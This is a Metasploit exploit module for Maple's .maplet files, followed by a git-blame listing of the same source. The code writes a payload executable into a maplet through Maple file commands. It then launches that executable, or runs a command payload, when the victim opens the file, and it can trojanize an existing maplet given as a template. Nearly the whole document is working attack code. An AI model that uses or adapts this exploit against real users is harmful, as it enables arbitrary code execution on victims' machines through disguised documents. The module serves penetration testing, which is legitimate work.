modules/exploits/multi/fileformat/maple_maplet.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Maple Maplet File Creation and Command Execution',
      'Description'    => %q{
          This module harnesses Maple's ability to create files and execute commands
        automatically when opening a Maplet. All versions up to 13 are suspected
        vulnerable. Testing was conducted with version 13 on Windows. Standard security
        settings prevent code from running in a normal maple worksheet without user
        interaction, but those setting do not prevent code in a Maplet from running.

        In order for the payload to be executed, an attacker must convince someone to
        open a specially modified .maplet file with Maple. By doing so, an attacker can
        execute arbitrary code as the victim user.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'scriptjunkie'
        ],
      'References'     =>
        [
          [ 'OSVDB', '64541'],
          [ 'URL', 'http://www.maplesoft.com/products/maple/' ]
        ],
      'Payload'        =>
        {
          'Space'    => 1024,
          'BadChars' => '',
          'DisableNops' => true,
#					'Compat'      =>
#						{
#							'PayloadType' => 'cmd',
#							'RequiredCmd' => 'generic perl telnet',
#						}
        },
      'Platform'       => %w{ win linux unix },
      'Targets'        =>
        [
          [ 'Windows',
            {
              'Arch'      => ARCH_X86,
              'Platform' => 'win'
            }
          ],

          [ 'Windows X64',
            {
              'Arch'      => ARCH_X64,
              'Platform' => 'win'
            }
          ],

          [ 'Linux',
            {
              'Arch'      => ARCH_X86,
              'Platform' => 'linux'
            }
          ],

          [ 'Linux X64',
            {
              'Arch'      => ARCH_X64,
              'Platform' => 'linux'
            }
          ],

          ['Universal CMD',
            {
              'Arch'      => ARCH_CMD,
              'Platform'       => %w{ linux unix win }
            }
          ]

        ],
      'DisclosureDate' => '2010-04-26',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TEMPLATE', [ false, 'The file to infect.', '']),
        OptString.new('FILENAME', [ true, 'The output file.', 'msf.maplet']),
      ])

  end


  def exploit
    cmd = ''
    content = ''
    if target['Arch'] != ARCH_CMD
      #Get payload as executable on whatever platform
      binary = generate_payload_exe

      #Get filename and random variable name for file handle in script
      fname = rand_text_alpha(3+rand(15))
      if target['Platform'] == 'win'
        fname << ".exe"
      end
      fhandle = rand_text_alpha(3+rand(15))

      #Write maple commands to create executable
      content = fhandle + " := fopen(\"#{fname}\",WRITE,BINARY);\n"
      exe = binary.unpack('C*')

      content << "writebytes(#{fhandle},[#{exe[0]}"
      lines = []
      1.upto(exe.length-1) do |byte|
        if(byte % 100 == 0)
          lines.push "]);\r\nwritebytes(#{fhandle},[#{exe[byte]}"
        else
          lines.push ",#{exe[byte]}"
        end
      end
      content << lines.join("") + "]);\r\n"

      content << "fclose(" + fhandle + ");\n"
      #Write command to be executed
      if target['Platform'] != 'win'
        content << "system(\"chmod a+x #{fname}\");\n"
      end
      content << "system[launch](\"#{fname}\");\n"
    else
      content << "system(\"#{payload.encoded}\");\n"
    end

    #Then put the rest of the original maplet
    if datastore['TEMPLATE'] != ''
      File.open(datastore['TEMPLATE'], 'rb') do |fd|
        content << fd.read( File.size(datastore['TEMPLATE']) )
      end
    end

    # Create the file
    print_status("Creating '#{datastore['FILENAME']}' file...")
    file_create(content)
  end
end
add Maple exploit from scriptjunkie 2010-05-01 02:05:56 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
add Maple exploit from scriptjunkie 2010-05-01 02:05:56 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
add Maple exploit from scriptjunkie 2010-05-01 02:05:56 +00:00			`Rank = ExcellentRanking`
Retab modules 2013-08-30 16:28:54 -05:00
add Maple exploit from scriptjunkie 2010-05-01 02:05:56 +00:00			`include Msf::Exploit::FILEFORMAT`
convert remaining EXE generation to use the mixin, fixes #2017 2010-09-20 04:38:13 +00:00			`include Msf::Exploit::EXE`
Retab modules 2013-08-30 16:28:54 -05:00
add Maple exploit from scriptjunkie 2010-05-01 02:05:56 +00:00			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Maple Maplet File Creation and Command Execution',`
			`'Description' => %q{`
			`This module harnesses Maple's ability to create files and execute commands`
			`automatically when opening a Maplet. All versions up to 13 are suspected`
			`vulnerable. Testing was conducted with version 13 on Windows. Standard security`
more cleanups 2010-05-03 17:13:09 +00:00			`settings prevent code from running in a normal maple worksheet without user`
add Maple exploit from scriptjunkie 2010-05-01 02:05:56 +00:00			`interaction, but those setting do not prevent code in a Maplet from running.`
Retab modules 2013-08-30 16:28:54 -05:00
add Maple exploit from scriptjunkie 2010-05-01 02:05:56 +00:00			`In order for the payload to be executed, an attacker must convince someone to`
more cleanups 2010-05-03 17:13:09 +00:00			`open a specially modified .maplet file with Maple. By doing so, an attacker can`
add Maple exploit from scriptjunkie 2010-05-01 02:05:56 +00:00			`execute arbitrary code as the victim user.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
			`'scriptjunkie'`
			`],`
			`'References' =>`
			`[`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '64541'],`
add Maple exploit from scriptjunkie 2010-05-01 02:05:56 +00:00			`[ 'URL', 'http://www.maplesoft.com/products/maple/' ]`
			`],`
tons of indentation fixes, some other style tweaks 2010-09-20 08:06:27 +00:00			`'Payload' =>`
add Maple exploit from scriptjunkie 2010-05-01 02:05:56 +00:00			`{`
			`'Space' => 1024,`
			`'BadChars' => '',`
			`'DisableNops' => true,`
			`# 'Compat' =>`
			`# {`
			`# 'PayloadType' => 'cmd',`
			`# 'RequiredCmd' => 'generic perl telnet',`
			`# }`
			`},`
Bug #8419 - Added platform info missing on exploits 2013-10-08 22:41:50 -04:00			`'Platform' => %w{ win linux unix },`
add Maple exploit from scriptjunkie 2010-05-01 02:05:56 +00:00			`'Targets' =>`
			`[`
			`[ 'Windows',`
			`{`
			`'Arch' => ARCH_X86,`
			`'Platform' => 'win'`
			`}`
			`],`
Retab modules 2013-08-30 16:28:54 -05:00
add Maple exploit from scriptjunkie 2010-05-01 02:05:56 +00:00			`[ 'Windows X64',`
			`{`
Implement first pass of architecture/platform refactor 2016-10-28 07:16:05 +10:00			`'Arch' => ARCH_X64,`
add Maple exploit from scriptjunkie 2010-05-01 02:05:56 +00:00			`'Platform' => 'win'`
			`}`
			`],`
Retab modules 2013-08-30 16:28:54 -05:00
add Maple exploit from scriptjunkie 2010-05-01 02:05:56 +00:00			`[ 'Linux',`
			`{`
			`'Arch' => ARCH_X86,`
			`'Platform' => 'linux'`
			`}`
			`],`
Retab modules 2013-08-30 16:28:54 -05:00
add Maple exploit from scriptjunkie 2010-05-01 02:05:56 +00:00			`[ 'Linux X64',`
			`{`
Implement first pass of architecture/platform refactor 2016-10-28 07:16:05 +10:00			`'Arch' => ARCH_X64,`
add Maple exploit from scriptjunkie 2010-05-01 02:05:56 +00:00			`'Platform' => 'linux'`
			`}`
			`],`
Retab modules 2013-08-30 16:28:54 -05:00
add Maple exploit from scriptjunkie 2010-05-01 02:05:56 +00:00			`['Universal CMD',`
			`{`
			`'Arch' => ARCH_CMD,`
Prefer Ruby style for single word collections 2013-09-24 12:33:31 -05:00			`'Platform' => %w{ linux unix win }`
add Maple exploit from scriptjunkie 2010-05-01 02:05:56 +00:00			`}`
			`]`
Retab modules 2013-08-30 16:28:54 -05:00
add Maple exploit from scriptjunkie 2010-05-01 02:05:56 +00:00			`],`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2010-04-26',`
add Maple exploit from scriptjunkie 2010-05-01 02:05:56 +00:00			`'DefaultTarget' => 0))`
Retab modules 2013-08-30 16:28:54 -05:00
add Maple exploit from scriptjunkie 2010-05-01 02:05:56 +00:00			`register_options(`
tons of indentation fixes, some other style tweaks 2010-09-20 08:06:27 +00:00			`[`
add Maple exploit from scriptjunkie 2010-05-01 02:05:56 +00:00			`OptString.new('TEMPLATE', [ false, 'The file to infect.', '']),`
			`OptString.new('FILENAME', [ true, 'The output file.', 'msf.maplet']),`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
Retab modules 2013-08-30 16:28:54 -05:00
add Maple exploit from scriptjunkie 2010-05-01 02:05:56 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00

add Maple exploit from scriptjunkie 2010-05-01 02:05:56 +00:00			`def exploit`
			`cmd = ''`
			`content = ''`
			`if target['Arch'] != ARCH_CMD`
			`#Get payload as executable on whatever platform`
convert remaining EXE generation to use the mixin, fixes #2017 2010-09-20 04:38:13 +00:00			`binary = generate_payload_exe`
Retab modules 2013-08-30 16:28:54 -05:00
add Maple exploit from scriptjunkie 2010-05-01 02:05:56 +00:00			`#Get filename and random variable name for file handle in script`
			`fname = rand_text_alpha(3+rand(15))`
			`if target['Platform'] == 'win'`
			`fname << ".exe"`
			`end`
			`fhandle = rand_text_alpha(3+rand(15))`
Retab modules 2013-08-30 16:28:54 -05:00
add Maple exploit from scriptjunkie 2010-05-01 02:05:56 +00:00			`#Write maple commands to create executable`
			`content = fhandle + " := fopen(\"#{fname}\",WRITE,BINARY);\n"`
			`exe = binary.unpack('C*')`
Retab modules 2013-08-30 16:28:54 -05:00
add Maple exploit from scriptjunkie 2010-05-01 02:05:56 +00:00			`content << "writebytes(#{fhandle},[#{exe[0]}"`
			`lines = []`
			`1.upto(exe.length-1) do \|byte\|`
			`if(byte % 100 == 0)`
			`lines.push "]);\r\nwritebytes(#{fhandle},[#{exe[byte]}"`
			`else`
			`lines.push ",#{exe[byte]}"`
			`end`
			`end`
			`content << lines.join("") + "]);\r\n"`
Retab modules 2013-08-30 16:28:54 -05:00
add Maple exploit from scriptjunkie 2010-05-01 02:05:56 +00:00			`content << "fclose(" + fhandle + ");\n"`
			`#Write command to be executed`
			`if target['Platform'] != 'win'`
			`content << "system(\"chmod a+x #{fname}\");\n"`
			`end`
			`content << "system[launch](\"#{fname}\");\n"`
			`else`
merge patch from scriptjunkie, fixes #1875 2010-05-11 22:28:18 +00:00			`content << "system(\"#{payload.encoded}\");\n"`
add Maple exploit from scriptjunkie 2010-05-01 02:05:56 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
add Maple exploit from scriptjunkie 2010-05-01 02:05:56 +00:00			`#Then put the rest of the original maplet`
			`if datastore['TEMPLATE'] != ''`
			`File.open(datastore['TEMPLATE'], 'rb') do \|fd\|`
			`content << fd.read( File.size(datastore['TEMPLATE']) )`
			`end`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
add Maple exploit from scriptjunkie 2010-05-01 02:05:56 +00:00			`# Create the file`
			`print_status("Creating '#{datastore['FILENAME']}' file...")`
			`file_create(content)`
			`end`
			`end`